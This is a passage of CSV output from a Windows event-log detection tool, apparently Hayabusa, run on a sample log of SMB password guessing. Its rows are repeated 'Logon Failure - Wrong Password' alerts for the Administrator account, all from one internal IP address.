01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.629 